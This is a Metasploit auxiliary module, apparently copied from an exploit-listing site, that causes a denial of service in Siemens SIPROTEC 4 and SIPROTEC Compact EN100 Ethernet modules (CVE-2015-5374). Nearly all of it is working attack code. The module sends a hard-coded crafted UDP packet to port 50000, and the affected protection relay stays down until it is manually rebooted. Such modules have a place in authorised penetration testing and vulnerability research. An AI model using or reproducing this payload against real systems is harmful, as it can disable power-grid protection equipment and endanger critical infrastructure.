Share
## https://sploitus.com/exploit?id=PACKETSTORM:180487
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Udp  
include Msf::Auxiliary::Dos  
def initialize(info = {})  
super(  
'Name' => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',  
'Description' => %q{  
This module sends a specially crafted packet to port 50000/UDP  
causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.  
A manual reboot is required to return the device to service.  
CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.  
},  
'Author' => [ 'M. Can Kurnaz' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 1 $',  
'References' =>  
[  
[ 'CVE' '2015-5374' ],  
[ 'EDB', '44103' ],  
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01' ]  
])  
register_options([Opt::RPORT(50000),])  
end  
def run  
connect_udp  
pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"  
print_status('Sending DoS packet...')  
udp_sock.put(pckt)  
disconnect_udp  
end  
end